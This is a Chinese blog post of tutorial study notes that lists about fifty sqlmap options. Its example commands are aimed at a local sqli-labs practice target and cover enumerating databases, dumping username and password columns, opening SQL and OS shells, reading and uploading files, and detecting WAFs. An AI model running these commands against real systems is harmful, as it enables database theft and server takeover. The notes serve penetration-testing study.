某教程学习笔记（一）：12、sqlmap使用介绍

原创

web安全工具库 2022-12-27 00:12:38 博主文章分类：某教程学习笔记 ©著作权

文章标签 sqlmap web安全学习笔记 sql php 文章分类 虚拟化云计算

©著作权归作者所有：来自51CTO博客作者web安全工具库的原创作品，请联系作者获取转载授权，否则将追究法律责任

床头的插座连着充电器，充电器连着手机，手机连着耳机，耳机连着我，这样的我，好像一个输液的病人。。。

---- 网易云热评

一、环境：kali 2020.01，python2或python3

二、命令介绍

1、sqlmap --update 更新命令

2、is-dba 查询是否是管理员权限

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --is-dba

某教程学习笔记（一）：12、sqlmap使用介绍_sqlmap

3、dbs 获取所有数据库名称

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --dbs

某教程学习笔记（一）：12、sqlmap使用介绍_php_02

4、current-db 获取当前数据库名称

5、users 获取所有数据库用户

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --users

某教程学习笔记（一）：12、sqlmap使用介绍_学习笔记_03

6、current-users 获取当前数据库用户

7、tables 获取所有表的信息

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --tables -D security

某教程学习笔记（一）：12、sqlmap使用介绍_sql_04

8、columns 获取所有列的信息

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --columns -T users -D security

某教程学习笔记（一）：12、sqlmap使用介绍_php_05

9、dump 获取字段内容

10、–level 指定扫描等级

11、D 指定数据库

12、T 指定表

13、C 指定列

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --dump -C “username,password” -T users -D security

某教程学习笔记（一）：12、sqlmap使用介绍_php_06

14、dbms=mysql 指定数据库

15、v 显示调试信息

16、risk 显示风险等级

17、u 获取目标

18、m c:\1.txt 从文件总获取多个目标探测

19、data=“id=1” post方式注入

20、data=“su=123 $某教程学习笔记（一）：12、sqlmap使用介绍_php_07$ ” 分割参数

21、cookie cookie注入

22、referer 伪造http请求中的referer

23、headers 伪造http请求中的头部

24、proxy 添加代理，http://url:port

25、delay 设置两个请求间的延迟

26、timeout 设定请求超时时间

27、retries 设定重现链接次数

28、safe-url 提供一个连接，每隔一段时间就会去访问一下

29、safe-freq 提供一个连接，每次请求之后都会去访问一下

30、p “io=123” 指定参数进行探测注入

31、prefix 闭合语句的前面

32、suffix 闭合语句的后面

33、technique 指定探测方式

34、B:布尔型注入，E:报错型注入，U:联合查询注入，S:多语句查询注入，T:时间延迟注入

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --technique=U

某教程学习笔记（一）：12、sqlmap使用介绍_学习笔记_08

35、union-cols 指定联合查询的字段数

36、union-char 指定联合查询用到的字符

37、second-order 二阶注入后面跟跳转网址

38、search用来寻找特定的数据库名、表名、列名

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --search -T users

某教程学习笔记（一）：12、sqlmap使用介绍_sqlmap_09

39、t “c:\1.txt” 把请求与相应的日志保存起来

40、batch 全自动按默认操作

41、charset=GBk 指定字符编码

42、flush-session 清空之前的session重新测试

43、hex 使用hex函数避免编码问题

44、smart 快速注入

45、mobile 设置成手机UA

45、identify-waf 监测用的什么waf

46、check-waf 监测是否存在waf

47、common-tables -D text 暴力破解表名(access)

48、common-columns -D text -T ttt 暴力破解列名

49、tamper base64encode.py base64编码注入

50、sql-query=“select version()” 执行sql语句

51、sql-shell 直接获取sql语句执行权限

sqlmap -u “http://192.168.21.135/sqli/Less-1/index.php?id=1” --sql-shell

某教程学习笔记（一）：12、sqlmap使用介绍_sqlmap_10

52、file-read 读取文件

53、file-write 本地路劲 file-dest 上传文件
54、os-shell 获取shell权限
55、schema --exclude-sysdbs 列出除系统以外的数据库

禁止非法，后果自负

欢迎关注公众号：web安全工具库

某教程学习笔记（一）：12、sqlmap使用介绍_sql_11

上一篇：漏洞扫描工具 -- awvs13

下一篇：某教程学习笔记（一）：14、上传漏洞讲解

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯